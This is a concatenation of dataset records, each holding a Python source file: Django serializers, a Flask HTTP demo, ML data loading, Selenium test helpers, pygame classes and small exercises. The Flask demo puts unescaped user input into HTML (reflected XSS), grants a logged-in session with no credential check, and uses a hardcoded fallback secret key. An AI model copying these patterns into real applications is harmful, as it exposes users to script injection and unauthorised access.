slug_field='pk',\n read_only=True\n )\n\n class Meta:\n fields = ('id', 'text', 'author', 'score', 'pub_date', 'title')\n model = Review\n\n def validate(self, data):\n author = self.context['request'].user\n title_id = self.context.get('view').kwargs.get('title_id')\n if (Review.objects.filter(author=author, title=title_id).exists()\n and self.context['request'].method != 'PATCH'):\n raise serializers.ValidationError('Вы уже оставляли отзыв')\n return data\n\n\nclass CommentSerializer(serializers.ModelSerializer):\n author = serializers.SlugRelatedField(slug_field='username',\n read_only=True,)\n\n class Meta:\n fields = ('id', 'text', 'author', 'pub_date')\n model = Comment\n\n\nclass CategorySerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Category\n exclude = ['id']\n\n\nclass GenreSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Genre\n exclude = ['id']\n\n\nclass TitleSerializerRead(serializers.ModelSerializer):\n genre = GenreSerializer(many=True)\n category = CategorySerializer()\n rating = serializers.IntegerField(read_only=True)\n\n class Meta:\n model = Title\n fields = ('name', 'year', 'description', 'genre',\n 'category', 'rating', 'id')\n\n\nclass TitleSerializer(serializers.ModelSerializer):\n genre = serializers.SlugRelatedField(\n queryset=Genre.objects.all(),\n required=False,\n slug_field='slug',\n many=True,\n )\n category = serializers.SlugRelatedField(\n queryset=Category.objects.all(),\n required=False,\n slug_field='slug'\n )\n\n class Meta:\n model = Title\n fields = ('__all__')\n\n def validate_year(self, value):\n\n year = timezone.now().year\n if value > year:\n raise serializers.ValidationError(\n 'Проверьте год издания произведения!'\n )\n return value\n\n\nclass 
RegisterSerializer(serializers.ModelSerializer):\n\n email = serializers.EmailField(\n max_length=150,\n required=True,\n validators=[UniqueValidator(queryset=User.objects.all())]\n )\n username = serializers.CharField(\n max_length=150,\n required=True,\n validators=[UniqueValidator(queryset=User.objects.all())]\n )\n\n ERROR_ME_USERNAME_RESTRICTED = {\n 'username': 'registration \"me\" username restricted'}\n\n class Meta:\n fields = ['email', 'username']\n model = User\n\n def validate_username(self, value):\n if value == 'me':\n raise serializers.ValidationError(\n self.ERROR_ME_USERNAME_RESTRICTED\n )\n return value\n\n def create(self, validated_data):\n return User.objects.create(**validated_data)\n\n\nclass TokenSerializer(serializers.Serializer):\n\n username = serializers.CharField(\n required=True,\n max_length=150,\n )\n\n confirmation_code = serializers.CharField(\n required=True,\n max_length=555,\n )\n\n class Meta:\n fields = ['username', 'confirmation_code']\n\n\nclass UserSerializer(serializers.ModelSerializer):\n\n email = serializers.EmailField(\n max_length=150,\n required=True,\n validators=[UniqueValidator(queryset=User.objects.all())]\n )\n username = serializers.CharField(\n max_length=150,\n required=True,\n validators=[UniqueValidator(queryset=User.objects.all())]\n )\n\n def validate_username(self, value):\n if value == 'me':\n raise serializers.ValidationError(\n self.ERROR_ME_USERNAME_RESTRICTED\n )\n return value\n\n class Meta:\n fields = ['username', 'email', 'first_name',\n 'last_name', 'bio', 'role']\n model = User\n\n\nclass MeSerializer(serializers.ModelSerializer):\n\n email = serializers.EmailField(\n max_length=150,\n required=True,\n validators=[UniqueValidator(queryset=User.objects.all())]\n )\n username = serializers.CharField(\n max_length=150,\n required=True,\n validators=[UniqueValidator(queryset=User.objects.all())]\n )\n\n role = serializers.CharField(\n max_length=150,\n read_only=True\n )\n\n def validate_username(self, value):\n if value == 'me':\n raise serializers.ValidationError(\n self.ERROR_ME_USERNAME_RESTRICTED\n )\n return value\n\n class Meta:\n fields = ['username', 'email', 'first_name',\n 'last_name', 'bio', 'role']\n model = User\n","sub_path":"api_yamdb/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":5180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"7449355","text":"import os\n\nfrom flask import Flask, request, redirect, url_for, abort, make_response, session, g\n\napp = Flask(__name__)\napp.secret_key = os.getenv('SECRET_KEY', 'dasdadadsasd')\n\n\n@app.route('/hello', methods=['GET', 'POST'])\ndef hello():\n name = request.args.get('name')\n if name is None:\n name = request.cookies.get('name', 'Human')\n response = '<h1>Hello, %s!</h1>' % name\n # 根据用户认证状态返回不同的内容\n if 'logged_in' in session:\n response += '[Authenticated]'\n else:\n response += '[Not Authenticated]'\n return response\n\n\n# 钩子函数\n@app.before_request\ndef do_something():\n pass\n\n\n# 重定向\n@app.route('/')\ndef redirects():\n return redirect(url_for('hello'))\n\n\n# 错误处理\n@app.route('/404')\ndef not_found():\n abort(404)\n\n\n# 指定数据的MIME类型\n@app.route('/foo')\ndef foo():\n response = make_response({\n \"note\": {\n\n \"to\": \"Peter\",\n \"from\": \"Jane\",\n \"heading\": \"Remider\",\n \"body\": \"Don't forget the party!\"\n }\n }\n )\n\n response.mimetype = 'application/json'\n return response\n\n\n# 给浏览器设置cookie\n@app.route('/set/<name>')\ndef 
set_cookie(name):\n response = make_response(redirect(url_for('hello')))\n response.set_cookie('name', name)\n return response\n\n\n# 使用session模拟用户的认证功能\n@app.route('/login')\ndef login():\n session['logged_in'] = True # 写入\n return redirect(url_for('hello'))\n\n\n# 管理页面查看是否用户已经登陆\n@app.route('/admin')\ndef admin():\n if 'logged_in' not in session:\n abort(403)\n return 'Welcome to admin page.'\n\n\n# 登出用户\n@app.route('/logout')\ndef logout():\n if 'logged_in' in session:\n session.pop('logged_in')\n return redirect(url_for('hello'))\n\n\n# 上下文全局变量\n@app.before_request\ndef get_name():\n g.name = request.args.get('name')\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"demos/http/http_app.py","file_name":"http_app.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"303919381","text":"import torch\n\nimport numpy as np \nfrom collections import defaultdict\n\nimport torch.utils.data as data\nimport config_abae_rs as conf\n\nfrom copy import deepcopy\n\ntrain_data_path = '%s/%s.train.data' % (conf.target_path, conf.data_name)\nval_data_path = '%s/%s.val.data' % (conf.target_path, conf.data_name)\ntest_data_path = '%s/%s.test.data' % (conf.target_path, conf.data_name)\n\nPAD = 0\n\ndef load_all():\n user_seq_dict = defaultdict(list)\n item_seq_dict = defaultdict(list)\n\n train_data = {}\n f = open(train_data_path)\n for idx, line in enumerate(f):\n line = eval(line)\n user, item, rating, abae_review = \\\n line['user'], line['item'], line['rating'], line['abae_review']\n train_data[idx] = [user, item, rating, abae_review]\n\n for sent in abae_review:\n sent = sent[:conf.seq_len]\n sent.extend([PAD]*(conf.seq_len - len(sent)))\n user_seq_dict[user].append(sent)\n item_seq_dict[item].append(sent)\n\n val_data = {}\n f = open(val_data_path)\n for idx, line in enumerate(f):\n line = eval(line)\n user, item, rating, abae_review = \\\n line['user'], line['item'], line['rating'], line['abae_review']\n val_data[idx] = [user, item, rating, abae_review]\n \n test_data = {}\n f = open(test_data_path)\n for idx, line in enumerate(f):\n line = eval(line)\n user, item, rating, abae_review = \\\n line['user'], line['item'], line['rating'], line['abae_review']\n test_data[idx] = [user, item, rating, abae_review]\n\n for user in user_seq_dict:\n if len(user_seq_dict[user]) < conf.user_seq_num:\n user_seq_dict[user].extend([[PAD]*conf.seq_len]*(conf.user_seq_num-len(user_seq_dict[user])))\n else:\n user_seq_dict[user] = user_seq_dict[user][:conf.user_seq_num]\n\n for item in item_seq_dict:\n if len(item_seq_dict[item]) < conf.item_seq_num:\n item_seq_dict[item].extend([[PAD]*conf.seq_len]*(conf.item_seq_num-len(item_seq_dict[item])))\n else:\n item_seq_dict[item] = item_seq_dict[item][:conf.item_seq_num]\n\n '''\n user_seq_num_list = []\n item_seq_num_list = []\n for user in user_seq_dict:\n user_seq_num_list.append(len(user_seq_dict[user]))\n for item in item_seq_dict:\n item_seq_num_list.append(len(item_seq_dict[item]))\n\n user_seq_num_list.sort()\n item_seq_num_list.sort()\n\n print('user:%d' % user_seq_num_list[int(0.85*len(user_seq_num_list))])\n print('item:%d' % item_seq_num_list[int(0.85*len(item_seq_num_list))])\n '''\n\n return train_data, val_data, test_data, user_seq_dict, item_seq_dict\n\nclass TrainData():\n def __init__(self, train_data, user_seq_dict=None, item_seq_dict=None):\n self.train_data = train_data\n self.user_seq_dict = user_seq_dict\n self.item_seq_dict = item_seq_dict\n\n 
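# train_data maps an integer index to [user, item, rating, abae_review]; user_seq_dict / item_seq_dict hold each user's and item's review sentences, already truncated or PAD-filled to conf.seq_len tokens by load_all().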
self.length = len(train_data.keys())\n\n    def get_batch(self, batch_idx_list):\n        user_list, item_list, label_list = [], [], []\n        user_pos_sent, user_neg_sent = [], []\n        item_pos_sent, item_neg_sent = [], []\n        for idx in batch_idx_list:\n            user, item, label = self.train_data[idx][0], self.train_data[idx][1], self.train_data[idx][2]\n\n            user_list.append(user)\n            item_list.append(item)\n            label_list.append(label)\n\n            user_pos_sent.extend(self.user_seq_dict[user])\n            for _ in self.user_seq_dict[user]:\n                for _ in range(conf.num_neg_sent):\n                    j = np.random.randint(conf.num_users-1)\n                    while j == user or j not in self.user_seq_dict:\n                        # resample from the user id range, not from the training-set size\n                        j = np.random.randint(conf.num_users-1)\n                    xx = np.random.randint(conf.user_seq_num-1)\n                    user_neg_sent.append(self.user_seq_dict[j][xx])\n\n            item_pos_sent.extend(self.item_seq_dict[item])\n            for _ in self.item_seq_dict[item]:\n                for _ in range(conf.num_neg_sent):\n                    j = np.random.randint(conf.num_items-1)\n                    while j == item or j not in self.item_seq_dict:\n                        # resample from the item id range, not from the training-set size\n                        j = np.random.randint(conf.num_items-1)\n                    xx = np.random.randint(conf.item_seq_num-1)\n                    item_neg_sent.append(self.item_seq_dict[j][xx])\n\n        return torch.LongTensor(user_list).cuda(), \\\n            torch.LongTensor(item_list).cuda(), \\\n            torch.FloatTensor(label_list).cuda(), \\\n            torch.LongTensor(user_pos_sent).cuda(), \\\n            torch.LongTensor(user_neg_sent).cuda(), \\\n            torch.LongTensor(item_pos_sent).cuda(), \\\n            torch.LongTensor(item_neg_sent).cuda()\n","sub_path":"drive/My Drive/task/aspect_based_rs/src/amazon_pet/abae_rs/DataModule_abae_rs.py","file_name":"DataModule_abae_rs.py","file_ext":"py","file_size_in_byte":4856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"405638876","text":"import time\nfrom Swap import _swap\n\n\ndef selection_sort(data_list, draw_data, time_value):\n    \"\"\"\n    Does a selection sort on a list and visualizes it\n    Expected Complexity (Sort only): O(n^2) (time) and O(1) (space)\n\n    :param data_list: Python list to be sorted\n    :param draw_data: Function written in main.py to visualize the list\n    :param time_value: Float based on the input for the time between steps\n    \"\"\"\n    for i in range(len(data_list)):\n        min_index = i\n\n        # locate the min in the remaining elements and move it to the front of the unsorted region\n        for j in range(i + 1, len(data_list)):\n            if data_list[min_index] > data_list[j]:\n                min_index = j\n\n        # generate the color list to be visualized\n        color_list = [\"red\" for x in range(len(data_list))]\n\n        # color the min index blue\n        for x in range(len(data_list)):\n            if x == min_index:\n                color_list[x] = \"blue\"\n\n        # visualize the list and wait for the specified amount of time\n        draw_data(data_list, color_list)\n        time.sleep(time_value)\n\n        _swap(data_list, i, min_index)\n\n        # generate the color list to be visualized\n        color_list = [\"red\" for x in range(len(data_list))]\n\n        # color the values being swapped green\n        for x in range(len(color_list)):\n            if (x == i) or (x == min_index):\n                color_list[x] = \"green\"\n\n        # visualize the list and wait for the specified amount of time\n        draw_data(data_list, color_list)\n        time.sleep(time_value)\n\n    # color the whole list green after the sort\n    draw_data(data_list, [\"green\" for i in range(len(data_list))])\n","sub_path":"gui_based_sorts/SelectionSort.py","file_name":"SelectionSort.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"333592425","text":"import time\nfrom 
selenium.webdriver import ActionChains\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\n\nfrom common.webdriver_qa_api.core.utils import assert_should_be_equal, fail_test, assert_should_be_not_equal,\\\n assert_should_contain, assert_should_not_contain, assert_should_be_greater_than\nfrom common.webdriver_qa_api.core.selenium_dynamic_elements import DynamicElement, DynamicElements\nfrom common.scaf import get_logger, config\n\nlogger = get_logger(__name__)\n\n\nclass BaseElement:\n WAIT_SECONDS = config.web_settings.webdriver_default_wait_time\n\n def __init__(self, locator_type, locator, driver, name=None, parent=None):\n self.locator_type = locator_type\n self.locator = locator\n self.driver = driver\n self.parent = parent\n self.name = locator if name is None else name\n self.ALLOWED_DYNAMIC_METHODS = None\n self.element = DynamicElement(locator_type=locator_type,\n locator=locator,\n driver=driver, name=name,\n parent=parent)\n\n def __getattr__(self, item):\n if self.ALLOWED_DYNAMIC_METHODS is not None:\n assert item in self.ALLOWED_DYNAMIC_METHODS, f\"get attribute {item} directly is forbidden\"\n return getattr(self.element, item)\n\n def assert_present(self, is_present=True, with_waiting=True):\n \"\"\"\n assert element present, test fails if expected state isn't equal to actual\n :param is_present: if true - should be present, if false - should be absent\n :param with_waiting: if true - find element using is_present() method (with implicitly wait timeout),\n if false - find element using is_present_without_waiting() method (without timeout)\n \"\"\"\n actual_state = self.is_present() if with_waiting else self.is_present_without_waiting()\n assert_should_be_equal(actual_value=actual_state, expected_value=is_present,\n message=f\"Verify is element '{self.name}' present on the page\")\n\n def assert_enabled(self, is_enabled=True):\n \"\"\"\n assert element enabled, test fails if expected state isn't equal to actual\n :param is_enabled: if true - should be enabled, if false - should be disabled\n \"\"\"\n actual_state = self.element.is_enabled()\n assert_should_be_equal(actual_value=actual_state, expected_value=is_enabled,\n message=\"Verify is element '{}' \"\n \"enabled {}\".format(self.name, is_enabled))\n\n def assert_visible(self, is_visible=True):\n \"\"\"\n assert element visible, test fails if expected state isn't equal to actual\n :param is_visible: if true - should be visible, if false - should be hidden\n \"\"\"\n actual_state = self.element.is_displayed()\n assert_should_be_equal(actual_value=actual_state,\n expected_value=is_visible,\n message=\"Verify is element '{}' \"\n \"visible\".format(self.name))\n\n def assert_focused(self, is_focused=True):\n \"\"\"\n assert element focused, test fails if expected state isn't equal to actual\n :param is_focused: if true - should be focused, if false - not focused\n \"\"\"\n expected_state = \"true\" if is_focused else \"false\"\n actual_state = self.element.get_attribute(\"focused\")\n assert_should_be_equal(actual_value=actual_state, expected_value=expected_state,\n message=\"Verify is element '{}' focused\".format(self.name))\n\n def assert_element_text(self, expected):\n \"\"\"\n assert that element text is equal to expected\n \"\"\"\n element_text = self.element.text\n assert_should_be_equal(actual_value=element_text, expected_value=expected, silent=True)\n\n def assert_element_attribute(self, 
attribute, expected_value):\n \"\"\"\n assert that element attribute is equal to expected\n \"\"\"\n attribute_value = self.element.get_attribute(attribute)\n assert_should_be_equal(actual_value=attribute_value, expected_value=expected_value, silent=True)\n\n def assert_element_contains_text(self, expected):\n \"\"\"\n assert that element text contains expected value {expected}\n \"\"\"\n element_text = self.element.text\n assert_should_contain(actual_value=expected, expected_value=element_text, silent=True)\n\n def assert_element_should_not_contain_text(self, expected):\n \"\"\"\n assert that element text contains expected value {expected}\n \"\"\"\n element_text = self.element.text\n assert_should_not_contain(actual_value=expected,\n expected_value=element_text,\n silent=True)\n\n def assert_element_text_empty(self):\n \"\"\"\n assert that element text is empty (equals with empty string)\n \"\"\"\n self.assert_element_text(\"\")\n\n def assert_element_text_not_empty(self):\n \"\"\"\n assert that element text is not empty (equals with empty string)\n \"\"\"\n element_text = self.element.text\n assert_should_be_not_equal(actual_value=element_text, expected_value=\"\", silent=True)\n\n def is_present(self):\n \"\"\"\n :return: true if element is present, false if element is absent\n \"\"\"\n return self.element() is not None\n\n def is_present_without_waiting(self):\n \"\"\"\n :return: true if element is present, false if element is absent\n \"\"\"\n try:\n self.driver.implicitly_wait(0)\n WebDriverWait(self.driver, 0).until(EC.presence_of_element_located((self.locator_type, self.locator)))\n return True\n except:\n return False\n finally:\n self.driver.implicitly_wait(config.web_settings.webdriver_implicit_wait_time)\n\n def _wait_element(self, silent=False, second=WAIT_SECONDS):\n \"\"\"\n wait for element present\n\n :param silent: true - log message isn't displayed, false - log message is displayed\n :param second: number of seconds after which test will fail if element is absent.\n \"\"\"\n if not silent:\n logger.info(\"Wait for '{0}' in {1} seconds\".format(self.name, second))\n wait = WebDriverWait(self.driver, second)\n wait.until(EC.presence_of_element_located((self.locator_type, self.locator)))\n return self\n\n def wait_element(self, silent=False, second=WAIT_SECONDS):\n \"\"\"\n wait for element present with fail test if element not be found\n :param silent: true - log message isn't displayed, false - log message is displayed\n :param second: number of seconds after which test will fail if element is absent.\n \"\"\"\n try:\n self._wait_element(silent, second)\n except TimeoutException:\n fail_test(\"The element {} can not be located in {} seconds\".format(self.name, second))\n return self\n\n def try_wait_element(self, silent=False, second=WAIT_SECONDS):\n \"\"\"\n wait to see if element becomes present during timeout\n :param silent: true - log message isn't displayed, false - log message is displayed\n :param second: number of seconds after which test will fail if element is absent.\n :return: true if element becomes present during timeout\n \"\"\"\n try:\n self._wait_element(silent, second)\n except TimeoutException:\n return False\n return True\n\n def wait_element_absent(self, silent=False, second=WAIT_SECONDS):\n \"\"\"\n wait for element absent (if timeout more than 20 second, find element with default timeout,\n else find element every 0.1 seconds)\n :param silent: true - log message isn't displayed, false - log message is displayed\n :param second: number of seconds 
after which the test will fail if the element is still present.\n        \"\"\"\n        present_method = self.is_present if second > 30 else self.is_present_without_waiting\n\n        if not silent:\n            logger.info(\"Wait for '{0}' absent in {1} seconds\".format(self.name, second))\n        end_time = time.time() + second\n        present = True\n        while time.time() < end_time and present:\n            present = present_method()\n            time.sleep(0.1)\n        self.assert_present(is_present=False, with_waiting=False)\n\n    def wait_element_enabled(self, silent=False, second=WAIT_SECONDS):\n        \"\"\"\n        wait for element enabled\n        :param silent: true - log message isn't displayed, false - log message is displayed\n        :param second: number of seconds after which the test will fail if the element is still disabled.\n        \"\"\"\n        if not silent:\n            logger.info(\"Wait for '{0}' is enabled\".format(self.name))\n        assert_should_be_equal(actual_value=self.element.is_enabled, expected_value=True,\n                               message=\"Verify is element '{}' enabled\".format(self.name),\n                               timeout=second, silent=silent)\n\n    def wait_element_disabled(self, silent=False, second=WAIT_SECONDS):\n        \"\"\"\n        wait for element disabled\n        :param silent: true - log message isn't displayed, false - log message is displayed\n        :param second: number of seconds after which the test will fail if the element is still enabled.\n        \"\"\"\n        if not silent:\n            logger.info(\"Wait for '{0}' is disabled\".format(self.name))\n        assert_should_be_equal(actual_value=self.element.is_enabled, expected_value=False,\n                               message=\"Verify is element '{}' disabled\".format(self.name),\n                               timeout=second, silent=silent)\n\n    def wait_element_visible(self, silent=False, second=WAIT_SECONDS):\n        \"\"\"\n        wait for element visible\n        :param silent: true - log message isn't displayed, false - log message is displayed\n        :param second: number of seconds after which the test will fail if the element is still invisible.\n        \"\"\"\n        if not silent:\n            logger.info(\"Wait for '{0}' is visible\".format(self.name))\n        assert_should_be_equal(actual_value=self.element.is_displayed, expected_value=True,\n                               message=\"Verify is element '{}' visible\".format(self.name),\n                               timeout=second, silent=silent)\n\n    def wait_element_invisible(self, silent=False, second=WAIT_SECONDS):\n        \"\"\"\n        wait for element invisible\n        :param silent: true - log message isn't displayed, false - log message is displayed\n        :param second: number of seconds after which the test will fail if the element is still visible.\n        \"\"\"\n        if not silent:\n            logger.info(\"Wait for '{0}' is invisible\".format(self.name))\n        assert_should_be_equal(actual_value=self.element.is_displayed, expected_value=False,\n                               message=\"Verify is element '{}' invisible\".format(self.name),\n                               timeout=second, silent=silent)\n\n    def wait_element_contains_text(self, expected, second=WAIT_SECONDS):\n        end_time = time.time() + second\n        while time.time() < end_time and expected not in \\\n                self.element.text:\n            time.sleep(0.1)\n        self.assert_element_contains_text(expected)\n\n    def wait_element_does_not_contain_text(self, expected, second=WAIT_SECONDS):\n        end_time = time.time() + second\n        while time.time() < end_time and expected in self.element.text:\n            time.sleep(0.1)\n        self.assert_element_should_not_contain_text(expected)\n\n    def get_element_location(self, silent=True):\n        \"\"\"\n        find element and get its location\n        :param silent: true - log message isn't displayed, false - log message is displayed\n        :return: location of element ('x' and 'y')\n        \"\"\"\n        if not silent:\n            logger.info(\"Get location of element '{}'\".format(self.locator))\n        return self.element.location\n\n    def click_by_coord(self):\n        action = ActionChains(self.driver)\n 
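# ActionChains queues low-level actions and replays them on perform(); the (5, 5) offset below clicks near the element's top-left corner (Selenium 3 semantics; Selenium 4 moved the offset origin to the element's in-view center).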
action.move_to_element_with_offset(self.element, 5, 5)\n action.click()\n action.perform()\n\n def wait_element_loaded(self, second=10):\n wait = WebDriverWait(self.driver, second)\n try:\n wait.until(EC.staleness_of(self.element()))\n except TimeoutException:\n pass\n finally:\n wait.until(EC.visibility_of(self.element()))\n\n\nclass BaseElements:\n def __init__(self, locator_type, locator, driver, name=None, parent=None):\n self.locator_type = locator_type\n self.locator = locator\n self.driver = driver\n self.elements = DynamicElements(locator_type=locator_type,\n locator=locator,\n driver=driver,\n name=name,\n parent=parent)\n\n def assert_elements_number_greater_than(self, expected):\n actual = len(self.elements())\n assert_should_be_greater_than(actual, expected)\n\n\nclass BaseElementsActionsMixin:\n\n def get_elements_text(self):\n \"\"\"\n find elements and get it's text\n :return: list of the text of element\n \"\"\"\n result = []\n for element in self():\n result.append(element.text)\n return result\n","sub_path":"common/webdriver_qa_api/core/base_elements.py","file_name":"base_elements.py","file_ext":"py","file_size_in_byte":13644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"80755466","text":"# Exercise 33: Birthday Dictionaries\n#\n# Find birthday information based on their name.\n\n\n# Main function\ndef main():\n # Get the dictionary\n dict = create_dict()\n\n print(\"Welcome to the birthday dictionary. We know the birthdays of:\")\n\n for key in dict:\n print(key)\n\n famous_person = input(\"Whose birthday do you want to look up?\\n\")\n\n print(\"{}\\'s birthday is on {}\".format(famous_person, dict[famous_person]))\n\n\n# Create a dictionary with famous people's birthdays\ndef create_dict():\n # Create a dictionary with birthdays\n bday_dictionary = {\n \"Albert Einstein\": \"March 14, 1879\",\n \"Benjamin Franklin\": \"January 17, 1706\",\n \"Ada Lovelace\": \"December 10, 1815\"\n }\n\n return bday_dictionary\n\n\nif __name__ == '__main__':\n main()","sub_path":"exercise33.py","file_name":"exercise33.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"462464313","text":"# Script that prompts the user to enter hours and rate per hour to calculate pay of the person provided he worked everyday, every week every month\n\nhours = int(input('Enter hours worked in a day: '))\nrate_per_hour = int(input('Enter your rate per hour: '))\ndaily_earning = hours * rate_per_hour\nweekly_earning = daily_earning * 5\nmonthly_earning = weekly_earning * 4\nyearly_earning = monthly_earning * 12\nprint(f'My daily earning if I worked {hours} hours with {rate_per_hour} $ is: $',daily_earning)\nprint('My weekly earning is: $',weekly_earning)\nprint('My monthly earning is: $',monthly_earning)\nprint('My yearly earning is: $',yearly_earning)\n","sub_path":"wagesearn.py","file_name":"wagesearn.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"417332677","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\nclass Solution:\n def reverse(self, x):\n \"\"\"\n :type x: int\n :rtype: int\n \"\"\"\n if x>2**31-1 or x<(-2)**31:\n return 0\n n_type = 0\n if x > 0:\n x = str(x)\n else:\n x = str(x * -1)\n n_type = -1\n\n result = x[::-1]\n if n_type == 0:\n print(int(result))\n return int(result)\n else:\n print(int(result) * -1)\n return int(result) 
* -1\n\n\nif __name__ == '__main__':\n    s = Solution()\n    s.reverse(1534236469)","sub_path":"leetcode/fanzhuanshu.py","file_name":"fanzhuanshu.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"383868058","text":"# PYTHON script\n\n'''\nPAMCRASH check materials for Nissan\n===================================\n\nChecks materials against a matching list and the material-name segment of each property name:\n\nUsage\n-----\n\n**Primary solver** - ABAQUS/PAMCRASH/NASTRAN.\n\n**User defined parameters**:\n\n- delimiter for the part-name segment, e.g. __\n- number of segments in property names, e.g. 5\n- type of loadcase, e.g. COMMON\n  if the parameter is empty, a list of loadcases pops up;\n  if the matching list contains only one loadcase, just that one is applied\n- segment of the material name, e.g. 5\n- matching list - /data/fem/+software/SKODA_INCLUDE/white_list\n\n**Fix function** is available for some warnings.\n\n'''\n\nimport os, ansa\nfrom ansa import base, constants\n\n# ==============================================================================\n\nDEBUG = 0\n\nif DEBUG:\n\tPATH_SELF = '/data/fem/+software/SKRIPTY/tools/python/ansaTools/checks/general_check/default'\n#\tPATH_SELF = os.path.dirname(os.path.realpath(__file__))\nelse:\n\tPATH_SELF = os.path.join(os.environ['ANSA_TOOLS'], 'checks','general_check','default')\nansa.ImportCode(os.path.join(PATH_SELF, 'check_base_items.py'))\n\nansa.ImportCode(os.path.join(PATH_SELF, 'check_PAM_materials_ex_fix.py'))\nexe = check_PAM_materials_ex_fix.exe\nfix = check_PAM_materials_ex_fix.fix\n\n# ==============================================================================\n\nclass CheckItem(check_base_items.BaseEntityCheckItem):\n\tSOLVER_TYPE = constants.PAMCRASH\n\tENTITY_TYPES = ['SHELL', 'MEMBRANE', 'SOLID']\n\n# ==============================================================================\n\t\n# Update this dictionary to load check automatically\ncheckOptions = {'name': 'Check materials with a checking list (ABA/PAM/NAS) - NISSAN',\n\t'exec_action': ('exe', os.path.realpath(__file__)),\n\t'fix_action': ('fix', os.path.realpath(__file__)),\n\t'deck': CheckItem.SOLVER_TYPE,\n\t'requested_types': CheckItem.ENTITY_TYPES,\n\t'info': 'Checks materials'}\ncheckDescription = base.CheckDescription(**checkOptions)\n\n# Add parameters\ncheckDescription.add_str_param('Number of segments', '4')\ncheckDescription.add_str_param('Segment of material name', '2')\ncheckDescription.add_str_param('Type of loadcase', 'PV1200')\ncheckDescription.add_str_param('Solver', 'PAMCRASH')\ncheckDescription.add_str_param('Matching list', '/data/ostatni/NISSAN/BATTERY_CASE/SCRIPTS/white_list')\ncheckDescription.add_str_param('Delimiter for part name', '__')\n\n# ==============================================================================\n\nif __name__ == '__main__' and DEBUG:\n\t\n\ttestParams = {\n\t\t'Number of segments': '4',\n\t\t'Segment of material name': '2',\n\t\t'Type of loadcase': 'PV1200',\n\t\t'Solver': 'PAMCRASH',\n\t\t'Matching list': '/data/ostatni/NISSAN/BATTERY_CASE/SCRIPTS/white_list',\n\t\t'Delimiter for part name': '__'}\n\tcheck_base_items.debugModeTestFunction(CheckItem, testParams)\n\n# 
==============================================================================\n\n","sub_path":"res/checks/check_PAM_materials_ex_fix_nissan.py","file_name":"check_PAM_materials_ex_fix_nissan.py","file_ext":"py","file_size_in_byte":2917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"513401106","text":"import sys\nfrom enum import Enum\n\nimport pygame\n\n\nclass Scoreboard:\n\n def __init__(self):\n self.score_value = 0\n self.font = pygame.font.Font('freesansbold.ttf', 32)\n self.textX = 10\n self.textY = 10\n self.over_font = pygame.font.Font('freesansbold.ttf', 100)\n self.won_font = pygame.font.Font('freesansbold.ttf', 100)\n self.replay_font = pygame.font.Font('freesansbold.ttf', 20)\n\n def show_score(self, screen):\n score_text = self.font.render(\"Score: \" + str(self.score_value), True, (255, 255, 255))\n screen.blit(score_text, (self.textX, self.textY))\n\n def check_game_end(self, screen, enemy):\n if self.score_value >= 10:\n self.game_won_text(screen)\n return True\n if enemy > int(screen.get_height() - 200):\n self.game_over_text(screen)\n return True\n\n def game_won_text(self, screen):\n won_text = self.won_font.render(\"YOU WIN\", True, (255, 255, 255))\n replay_text = self.replay_font.render(\"Press 'R' To Play Again\", True, (255, 255, 255))\n rect1 = won_text.get_rect(center=(int(screen.get_width() / 2), int(screen.get_height() / 2)))\n rect2 = replay_text.get_rect(center=(int(screen.get_width() / 2), int(screen.get_height() / 2) + 70))\n screen.blit(won_text, rect1)\n screen.blit(replay_text, rect2)\n\n def game_over_text(self, screen):\n over_text = self.over_font.render(\"GAME OVER\", True, (255, 255, 255))\n replay_text = self.replay_font.render(\"Press 'R' To Play Again\", True, (255, 255, 255))\n rect1 = over_text.get_rect(center=(int(screen.get_width() / 2), int(screen.get_height() / 2)))\n rect2 = replay_text.get_rect(center=(int(screen.get_width() / 2), int(screen.get_height() / 2) + 70))\n screen.blit(over_text, rect1)\n screen.blit(replay_text, rect2)\n\n\nclass ControllerState(Enum):\n NONE = 0\n LEFT = 1\n RIGHT = 2\n SPACE = 3\n RESTART_KEY = 4\n KEY_RELEASE = 5\n\n\nclass playerInput:\n def __init__(self):\n self.game_running = True\n self.controller_state = ControllerState.NONE\n\n def movement(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.game_running = False\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n self.controller_state = ControllerState.LEFT\n if event.key == pygame.K_RIGHT:\n self.controller_state = ControllerState.RIGHT\n if event.key == pygame.K_SPACE:\n self.controller_state = ControllerState.SPACE\n if event.key == pygame.K_r:\n self.controller_state = ControllerState.RESTART_KEY\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\n self.controller_state = ControllerState.KEY_RELEASE\n","sub_path":"assets/Interface.py","file_name":"Interface.py","file_ext":"py","file_size_in_byte":3010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"262508997","text":"import cv2\nimport numpy as np\nimport tensorflow as tf\nimport scipy.io as scio\nimport scipy\nfrom scipy.ndimage.filters import gaussian_filter\n\n\ndef 